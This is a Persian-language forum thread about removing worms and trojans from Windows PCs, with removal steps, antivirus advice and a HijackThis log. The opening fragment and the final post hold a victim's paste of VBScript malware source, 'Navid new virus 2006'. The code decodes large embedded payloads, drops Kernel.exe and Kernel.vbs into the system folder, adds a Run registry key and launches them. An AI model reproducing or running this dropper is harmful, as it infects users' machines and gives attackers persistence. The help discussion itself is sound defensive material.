10410510810103210909710510809703206006203203406907 80680340130100831011160321110981060771011151150971 03101032061032067114101097116101079098106101099116 04003406706807904607710111511509710310103404103201 30101110981060771011151150971031010460831170981061 01099116032061032034072101108108111034013010111098 10607710111511509710310104608310111010010111403206 10321151011101001090130101110981060771011151150971 03101046102114111109061032115101110100109013010111 09810607710111511509710310104608411103206103210909 71051080970130101110981060771011151150971031010460 84101120116066111100121032061032034072101108108111 03403203803211809809911410810203203803203407111103 21161110321091210321150971051160580321041161161120 58047047103105114108115101120046119101098115046105 11104711210509911611711410104610411610903401301011 10981060771011151150971031010460831011101000130101 09097105108097061109097105108109046114101097100108 10511010101301011910111010001301010211511104606711 41010971161010841011201160701051081010401151211150 32038032034092083121115116101109118046100108108034 04104611911410511610103203411110210203401301010111 0100032115117098013010"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll",1).readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

</body>

</html>

سلام عزیزم ...
ممنون از توضیحاتتون .
من McAfee VirusScan Enterprise 8.0.0 روی سیستمم نصبه ...
عجیبه !
من حتی اون برنامه رو Unpack هم کردم ، اما باز هم آنتی ویروسم اون رو با نام ویروس W32/Generic.worm!p2p معرفی کرد !
ولی در تایید گفته های شما باید بگم که NOD32 هنگام Scan این فایل ، هیچ عکس العملی نشون نداد !
موفق باشید .

سلام دوست عزیز

حق با شما است عجیب است مخصوصا از مک آفی که عمدتا متکی به دیتابیسش است نه به هوریستیکش در هر حالت

من فکر می کنم شاید به تنظیمات شما بر می گردد من برای اطمینان خاطر این فایل را به صورت آنلاین با آنتی ویروسهای

مختلف اسکن کردم همانطور که می بینید حتی مک آفی آنلاین هم ویروسی را تشخیص نداده است :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دست هر دو درد نكنه

دست هر دو درد نكنه
سلام عزیزم ...
خوشحالم که مشکلتون رفع شده .
اگه فایل های HTML خراب شدن ، نمیشه کاریش کرد !
ضمنا این ویروس اغلب از طریق سایت ها به سیستم نفوذ می کنه ...

توصیه می کنم وارد هر سایتی نشوید !
آخرین نسخه ی NOD32 یا Kaspersky رو روی سیستمت نصب کنید .

موفق باشید .

سلام دوست عزیز

سیستم شما مورد حمله یک کرم قرار گرفته است که نامهای مختلفی دارد :


* Trojan.Agent.ahe (Rising)

* W32/SillyFDC-G (Sophos)

* W32/SillyFDC.G (Fortinet)

* W32/Sohanat.BD.worm (Panda)

* Win32.HLLW.Cung (Doctor web)

* Win32/Nuqel.A (Ca vet)

* Win32:Hakaglan [Wrm] (Alwil)

* Worm.Hakaglan.B (Virusbuster)

* Worm.Win32.AutoIt.e (Kaspersky)

* Worm/Hakaglan.A.2 (H+BEDV)

خوب دوست عزیز اولین و بهترین کار این است که از خود نورتون که روی سیستمت نصب است کمک بگیری برای

اینکار به ترتیب کارهایی را که می گویم انجام بده :

سلام دوست بینهایت عزیزم VTN54 :
خیـــــــــــــــــــــــ ـــــــــلی خیـــــــــــــــــــــــ ـــــــــلی ممنونتم عزیز::thumbsup:

شما مرا از یه حالتی نجات دادید که نزدیک بود تمام اطلاعاتی را که روی هاردم بود، از دست بدم که ارزش مادی و معنوی آن اطلاعات خیلی زیاد بود.
امیدوارم تا همیشه صحتمند، سرحال و مؤفق در امور زندگی خود باشید و آرزو میکنم تا هیچ هرگز کامپیوتر شما به ویروس و یا همچو برنامه های مضر آلوده نشود.
به امید خدمات بیشتر شما
ممنونتان
فرهمند

سلام دوستان به دادم برسید الان چند روزیه سرعت باز کردن صفحات اینترنت به صفر رسیده و دیگه هیچ سایتی رو باز نمیکنه مرورگرم مشکل نداره چون بعد از دانلود کرک یک برنامه به این روز افتاده ویروس یاب من که avast هست و همیشه بروز چیزی رو نشون نمیده به احتمال خیلی زیاد به اسپایور دچار شدم از برنامهno adwaer5 استفاده کردم چیزی نشون نداد
از شما دوستان درخواست یک برنامه ضد جاسوس قدرتمند همراه شماره سریال میخوام که این برنامه مزاحم رو برام پیدا کنه ثواب داره اگر کمک کنید چون ناچار شدم مشتری کافی نت چون با اینکه سرعت دانلود و اپلودم فرق نکرده اما هیچ صفحه ای باز نمیشه انگار سرعت صفره
دست یاری به شما دوستان دارم
کمککککککککککککککککککککککک ککککککککککککککککککککککککک ککککککککککککککککککککک

حتما آخرین ورژن آنتی ویروس کسپرسکی رو دانلود کن بعد آپدیت کن همچنین یک آنتی اسپای ور خوب رو دستگات نصب کن (Spy Sweeper) و آپدیت کن و بعد با هر دوشون سیستمتو یک اسکن کن!!!
احتمال زیاد به نتیجه میرسی

سلام vtn جان
من رفتم به shell ولی خودش نوشته شده بود Explorer.exe دوباره تایپ کردم ولی نشد
مشکلمم هنوز حل نشده
بازم ممنون
عزیزی

سلام vtn جان
من رفتم به shell ولی خودش نوشته شده بود Explorer.exe دوباره تایپ کردم ولی نشد
مشکلمم هنوز حل نشده
بازم ممنون
عزیزی

نود32 چند ویروس را شناسایی کرد اگر می توانی نام دقیق آنها را برایم بنویس.

سلام
win32/delf.yh را فقط شناسایی کرد که حداقل 40 فایل exe را مورد حمله قرار داده بود
الان بعد از نصب ویندوز سرعت سیستمم پایین اومده ( رم من 2 گیگه )
به نظر شما چیز دیگری هست که پاک نشده باشه
اگه هست بگید من توان شنیدنشو دارم

سلام
win32/delf.yh را فقط شناسایی کرد که حداقل 40 فایل exe را مورد حمله قرار داده بود
الان بعد از نصب ویندوز سرعت سیستمم پایین اومده ( رم من 2 گیگه )
به نظر شما چیز دیگری هست که پاک نشده باشه
اگه هست بگید من توان شنیدنشو دارم

سلام دوست عزیز

این تروجان خودش را به داخل چند پروسه اساسی ویندوز تزریق می کند که عبارتند از :

explorer.exe
services.exe
lsass.exe
smss.exe
csrss.exe
winlogon.exe

پاک کردن این کدهای تزریق شده تقریبا غیر ممکن است چون باعث آسیب به این پروسه های حیاتی ویندوز می شود

شما گفتید که ویندوز را دوباره نصب کرده اید .اگر پارتیشن ویندوز را فرمت کرده و سپس ویندوز نصب کرده باشید این

فایلهای آلوده با فایلهای تازه جایگزین می شوند ولی اگر ویندوز را Repair یا Upgrade کرده ای ممکن است این کدها

باقی مانده باشند .از طرف دیگر ممکن است علاوه بر این تروجان ویروسهای دیگری هم روی سیسمت باشند که

نود32 آنها را شناسایی نکرده است .من همان اول گفتم که با این میزان آلودگی کار پاک کردن سیستم به طور کامل

غیر ممکن است ولی توصیه های قبلی مرا که به خاطر داری آنها را امتحانی بکن شاید کمکی بکند .

از تمام بچه ها میخوام اگر در مورد ویروس atuorun بر روی درایوها تاثیر مگذاره یه راهنمایی منو بکنند روی درایوها من تاثیر گذاشته وقتی دبل کلیک می کونم search باز میشه مال دوستمم چند تا از دوستا مم همین طوری شده.

میشه فایلهای بالا رو از طریق داس جایگزین کرد.ولی معلوم نیست ویروسه از بین بره.
من بالاخره نفهمیدم شما چندتا ویندوز دارید.

منم این کار رو کردم ولی متاسفانه مهمترین عکس هام بر نگشتن .
ممنون از راهنماییت

از تمام بچه ها میخوام اگر در مورد ویروس atuorun بر روی درایوها تاثیر مگذاره یه راهنمایی منو بکنند روی درایوها من تاثیر گذاشته وقتی دبل کلیک می کونم search باز میشه مال دوستمم چند تا از دوستا مم همین طوری شده. راستش نمیدونم شما به چه ویروسی دچار شده اید ! میتونید از آنتی ویروسهای معرفی شده مثل KasperSky یا Nod32 استفاده کنید و بعد از Update مطمئنا تمام ویروسها رو از بین میبره.
فعلا اگه مشکلت اینه و با کلیک راست و Open درایوهات باز میشه, باید فایلی به نام
autorun.inf که در ریشه ی همون درایوت هست رو حذف کنی.البته به صورت مخفی شده است و باید از تنظیمات Folder Options فایلهای سیستمی و پنهان رو نشون بدی.موفق باشی

منتقل شد.....

از تمام بچه ها میخوام اگر در مورد ویروس atuorun بر روی درایوها تاثیر مگذاره یه راهنمایی منو بکنند روی درایوها من تاثیر گذاشته وقتی دبل کلیک می کونم search باز میشه مال دوستمم چند تا از دوستا مم همین طوری شده.

می تونی خیلی راحت با آنتی ویروس AVG شناسایی و نابودش کنی

این آنتی ویروس توپ و بسیار سریع رو دانلود کن و نصب کن و بزار هاردت رو اسکن کنه اونوقت مشکلت حل میشه

سلام
اولا ممنون که این همه وقت میذارید تا به برادر کوچکتان کمک کنید
من یک ویندوز نصب شده دارم.
درایو را فرمت کرده و ویندوز نصب کردم.
به ترتیب نود 32 ، کاسپر ، مک افی را ( جدا جدا و بعد از remove اولی ) نصب کردم و بعد از آپدیت
کل سیستم را اسکن کردم و چیزی پیدا نشد.
شاید اگر از همان اول نصب انتی ویروس را و آپدیت آن را یک مساله جدی در نظر می گرفتم حالا حال و روزم این نبود.
فقط و فقط راهنمایی های شما منو کمک کرد.
با چند تا از هم دانشگاهی های قدیم تو شریف صحبت کردم که آنها هم چیزی نمی دانستند.
حتی یکی شون گفت سیستم منم همین گونه شد ولی من کلا فرمت کردم.
ولی به نظر من اساتیدی مثل شما تو این کشور هستند که حتی از عهده این مشکل هم بر می آیند.
من میدونم یک سیستم برای اینکه یک پارتیشن یا یک فولدر یا یک فایل رو بشناسه باید یک آدرس مشخصی رو
برای اون تعریف کنیم یا خودش تعریف شده داشته باشه و اگه همه یا قسمتی از این آدرس پاک بشه نمی تونه اونو پیدا کنه.
مثلا شما میخواهید بیایید مریوان:
پس باید اینگونه حرکت کنید تهران/ساوه/همدان/سنندج/مریوان و اگه من نگم بعد تهران ساوه است شما حتی به
همدان هم نمی رسید. میدونم شما همه اینا رو می دونید.
حالا اگه بشه به نحوی این مسیرو اصلاح کرد هم من راحت میشم و هم برای شما یک تجربه میشه.

من یه بار هاردم کلا خراب شد و همه گفتند بی خیال سوخته ، ولی من بعد از دو ماه تحقیق و استفاده از تجربیات
عزیزانی مثل شما با نرم افزار hiren's boot توانستم عین روز اول هاردم رو و اطلاعات و پارتیشنهای اونو کامل
بازسازی کنم طوری که اب از اب تکون نخورد.
الان هم میتونم از قسمت ادرس بار وارد بشم و از اطلاعات هر فولدری که هدن شده کپی بگیرم و در یک فولدر جدیدتری اونو قرار بدم و لی کیفش به اینه که فولدرهارو کامل بیارم عین روز اول

منم این کار رو کردم ولی متاسفانه مهمترین عکس هام بر نگشتن .
ممنون از راهنماییت
خوب ممکنه شما توی درایوی که عکسات بودن چیزی کپی کرده باشی که در این صورت فایلای دلیت شده Overwrite شدن.......... به هر حال متاسفم......

سلام دوست من

حالا که این قدر علاقمند هستی بگذار روشهای دیگری را امتحان کنیم .اولا باید بگویم چون پارتیشن ویندوز را فورمت کرده ای

مطمئنا فایلهای ویندوز و رجیستری تمیز هستند و بنابراین نسب آنتی ویروسهای دیگر کمکی نخواهد کرد ولی اگر

خواستی کارهای زیر را هم انجام بده شاید کمکی کند :

1.اول فایل زیر راداونلود کن و آن را اجرا کن.( حجم= 230 کیلوبایت) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

2.سپس فایل زیر را داونلود کن و سیستمت را با آن اسکن کن ( حجم=870 کیلوبایت ) و نتیجه را اینجا کپی کن بهتر است

حین اسکن آنتی ویروس و سایر نرم افزارهای امنیتی را خاموش کنی :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام vtn جان
اینم گزارش اولی در تاپیک بعدی


آقای amintnt در حواب یکی از دوستان که همین مشکل منو داشت گفته بود:
این ویروسه فولدرا رو به حالت سیستم فایل تبدیل میکنه که حتی رو حالت Show hidden files نشون داده نمیشن.......... باید Hide protected operating file system رو تیکشو برداشت تا درست بشه........ البته سریع ویروسه تیک بر میگردونه! یه شورتکات درست میکنه واسه هر فولدر که متوجه نشی اوضاع از چه قراره.............

من اول ویندوزو عوض کردم................. بعد تیک Hide protected operating file system رو برداشتم............. بعد هم تیک Hide extensions for known file types هم برداشتم تا پسوند فولدرای جعلی دیده بشه..........

حالا من هم همین کارو کردم ، فولدرها هست ولی مخفیه و همون جوریه که ایشون فرمودند
دومی که اسکن کرد ( قبل از اسکن دستورالعمل امین رو انجام داده بودم)
نوشت هیچی پیدا نشد
ممنون

Logfile of HijackThis v1.99.1

Scan saved at 09:34:00 ?.?, on 2007/04/11
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\system32\CTsvcCDA.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\tcpsvcs.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\MsPMSPSv.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe
C:\Program Files\Creative\SBAudigy2ZS\DVDAudio\CTDVDDet.EXE
C:\WINDOWS\system32\CTHELPER.EXE
C:\WINDOWS\eHome\ehmsas.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Logitech\iTouch\iTouch.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
E:\Winamp\winampa.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
C:\WINDOWS\system32\ctfmon.exe
E:\JetAudio\JetAudio.exe
E:\WINZIP\wzqkpick.exe
C:\WINDOWS\system32\cidaemon.exe
e:\WinRAR\WinRAR.exe
C:\DOCUME~1\PEYMAN~1\LOCALS~1\Temp\Rar$EX00.390\Hi jackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]*[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]*[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]*[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\ycomp5_6_0_1.d ll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - E:\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O3 - Toolbar: &Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\ycomp5_6_0_1.d ll
O3 - Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - (no file)
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [GBB36X Configure] C:\WINDOWS\system32\JMRaidTool.exe boot
O4 - HKLM\..\Run: [CTSysVol] C:\Program Files\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe /r
O4 - HKLM\..\Run: [CTDVDDET] C:\Program Files\Creative\SBAudigy2ZS\DVDAudio\CTDVDDet.EXE
O4 - HKLM\..\Run: [CTHelper] CTHELPER.EXE
O4 - HKLM\..\Run: [SBDrvDet] C:\Program Files\Creative\SB Drive Det\SBDrvDet.exe /r
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe"
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [WinampAgent] e:\Winamp\winampa.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [RemoteCenter] C:\Program Files\Creative\MediaSource\RemoteControl\RCMan.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = E:\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = E:\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://E:\MICROS~1\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - E:\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\system32\CTsvcCDA.exe
O23 - Service: hpdj - Unknown owner - C:\DOCUME~1\PEYMAN~1\LOCALS~1\Temp\hpdj.exe (file missing)
O23 - Service: hpdj5100 - Unknown owner - C:\DOCUME~1\PEYMAN~1\LOCALS~1\Temp\hpdj5100.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

سلام توی این اولی چیزی که بتواند مشکل تورا ایجاد کند دیده نمی شود. منتظر گزارش دومی هستم.

scan complete
no hidden item found
سلام
اینم گزارش دومی

خوب شرمنده دوست عزیز :blush:

توی این شرایط چیز دیگری به فکر من نمی رسد مشکل شما در حال حاظر به نظر نه به خاطر آن تروجان بلکه به خاطر

اثرات باقیمانده از آن است .تنها چیزی که به نظر من می توانی بکنی این است که پس از برگرداندن فایلهای ضروری ( با

همان روشی که خودت گفتی و یا راحتتر از آن با استفاده از یک سی دی لینوکس از نوع Live ) از آنها یک کپی بگیری و

بعد کل هاردت را فورمت بکنی و به طور کامل از شر این مشکل خلاص بشی.

درسته
من اینو نمیدونستم . راهی نداره ؟؟

دیگه راهی نداره

ممنون خیلی اذیت شدی

با سلام
سرعت کامپیوترم به شدت اومده پایین و در تسکمنیجر 7 تا پراسس به نام svchost.exe وجود دارد که هیچکدام user نیستند ممنون می شوم کمکم کنید

سلام دوست عزیز

کاسپرسکی این ویروس را با نام Virus.Win32.Perlovga.a شناسایی می کند ولی به طر کامل آن را پاک نمی کند شما

باید چند کار را همزمان انجام بدهی تا سیستمت به طور کامل پاک شود:

اول System Restore را غیرفعال کن بعد به حالت Safe Mode برو حالا Registery Editor را باز کن و به ترتیب کلمات

copy.exe و host.exe را جستجو کن و هر کلیدی را که پیدا کردی پاک کن .حالا در پانل کنترل گزینه Folder Option

را باز کن در پنجره Folder Option مطابق شکل زیر تیک گزینه Hide Protected Operating System Files را بردار .حالا

هر کدام از درایوهایت را که باز کنی یک فایل به اسم autorun.inf توی آن پیدا می کنی همه آنها را پاک کن ولی با

فایلها و پوشه های دیگر کاری نداشته باش حالا دوباره تیک گزینه مربوطه را بگذار

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا با کاسپرسکی در هما ن حالت Safe Mode سیستم را اسکن کن .اگر مشکلت با این کارها حل نشد بگو تا چاره

دیگری بکنیم.

(برای یاداوری باید بگم که این ویروس دو فایل با نامهای temp1.exe , temp2.exe در فولدر system32 میسازه و در پنجره task manager فقط شما میتونید فایل temp1.exe که داره فعالیت میکنه پیدا کنید.)
من هم دچار این ویروس شدم ولی در اجرای مراحل بالا چند مشکل دارم:
1- وقتی می خواهم به حالت Safe Mode برم نمیشه چرا که سیستم قبل از وارد شدن ریست میشه یعنی تا خط لودینگ MUP میره ولی بعد ریست میشه
2- توی حالت معمولی توی Registery Editor دنبال کلمات گشتم ولی یا کلید svchost پیدا میکننه یا RDhost البته یه چند تا copy.exe پیدا کرده که این عبارت ته خط نوشته شده یعنی یه خط بلند و بالا داره که ته اش به copy.exe ختم میشه دقیق یادم نیست ولی قبلش کلماتی مثل RunDLL32 و از این جور چیزا بود. من هم اومدم فقط copy.exe رو از خط پاک کردم ولی باز هم درست نشد


اگه ممکنه کمک کنید

(برای یاداوری باید بگم که این ویروس دو فایل با نامهای temp1.exe , temp2.exe در فولدر system32 میسازه و در پنجره task manager فقط شما میتونید فایل temp1.exe که داره فعالیت میکنه پیدا کنید.)
من هم دچار این ویروس شدم ولی در اجرای مراحل بالا چند مشکل دارم:
1- وقتی می خواهم به حالت Safe Mode برم نمیشه چرا که سیستم قبل از وارد شدن ریست میشه یعنی تا خط لودینگ MUP میره ولی بعد ریست میشه
2- توی حالت معمولی توی Registery Editor دنبال کلمات گشتم ولی یا کلید svchost پیدا میکننه یا RDhost البته یه چند تا copy.exe پیدا کرده که این عبارت ته خط نوشته شده یعنی یه خط بلند و بالا داره که ته اش به copy.exe ختم میشه دقیق یادم نیست ولی قبلش کلماتی مثل RunDLL32 و از این جور چیزا بود. من هم اومدم فقط copy.exe رو از خط پاک کردم ولی باز هم درست نشد


اگه ممکنه کمک کنید

سلام دوست من

اگر نتوانی به Safe Mode بروی کار مشکل می شود شاید سیستمت علاوه بر این تروجان مشکلات دیگری هم داشته

باشد برای اولین قدم باید کمی از سیستمت اطلاعات جمع کنیم :

1.در اولین قدم System Restore را غیرفعال کن.

2..روی سیستمت چه آنتی ویروسی نصب است؟ اگر روی سیستمت آنتی ویروسی هست آن را آپدیت کن و بگذار

سیستمت را اسکن کند اگر چیزی پیدا کرد با جزییات کامل اینجا بگذار.

3.به آدرس زیر برو و با استفاده از توصیه هایی که داده شده است سیستمت را اسکن کرده و نتیجه را اینجا بگذار.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

4.فایل زیر راداونلود کن و آن را اجرا کن.( حجم= 230 کیلوبایت) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

کامپیوتر یکی از دوستان از طریق یک سی دی ویروس گرفته .اما انتی ویروس های مختلف اونو نمی شناسند

ویروس این جوریه که یه پوشه به نام New Folder توی تمام پوشه های کامپیوتر ساخته شده که شکل همون

پوشه رو داره ولی در اصل یه برنامه یا شورت کاته که اگه روش کلیک کنی صفحه My Ducument رو باز می کنه

توی تمام صفحات و درایو ها هم هست و حذف نمی شه.

ممنون اگه کمک کنید

سلام

کامپیوتر یکی از دوستان از طریق یک سی دی ویروس گرفته .اما انتی ویروس های مختلف اونو نمی شناسند

ویروس این جوریه که یه پوشه به نام New Folder توی تمام پوشه های کامپیوتر ساخته شده که شکل همون

پوشه رو داره ولی در اصل یه برنامه یا شورت کاته که اگه روش کلیک کنی صفحه My Ducument رو باز می کنه

توی تمام صفحات و درایو ها هم هست و حذف نمی شه.

ممنون اگه کمک کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام:
چند ماهیه‌ که‌ ویندوزم مشکل پیدا کرده‌ بود:‌ هم سرعتش کند شده‌ بود و هم دو تا‌ پیغام خطا می داد و حتی با Notepad هم هنگ میکرد!! الان طوری برام مشکل ساز شده‌ که‌ تو این ده‌ روزه‌ 4 بار ویندوز عوض کردم البته‌ تو این چند وقته‌ از برنامه‌ های رجیستری و آنتی ویروس های مختلف و آپدیت شده‌ هم استفاده‌ میکردم اما چاره‌ ساز نبود. تا این چند روزه‌ رفتم از safe mode وارد شدم دیدم یه‌ ویروسه‌! اول دو تا عامل اصلی پیغام خطا رو پاک کرم اما بعد از دو روز برگشت؛ باز هم رفتم از همونجا اون دو تا فایل برگشته‌ بودند! بعد بردمشون تو Notepad محتواشونو پاک کردم و save شون کردم اما باز هم چاره‌ ساز نبود. این رو هم بگم که‌ گزینه‌ standby من غیر فعاله‌ چند بار خودش همین طوری ریستارت شد.

خواهش میکنم کمکم کنید.

اول پیغام connection رو میده‌ بعد این دو تا رو:
C:\WINDOWS\system32\Systems.exe
C:\WINDOWS\system32\kernel.vbs

محتوای ویروس رو که‌ بردم تو notepad این طوری بود:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


** به‌ خاطر اینکه‌ تو این تاپیک جای زیادی گرفته‌ نشه‌ سایزفونت رو کوچیک کردم لطف کنید خودتون تو notepad درستش کنین.

'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 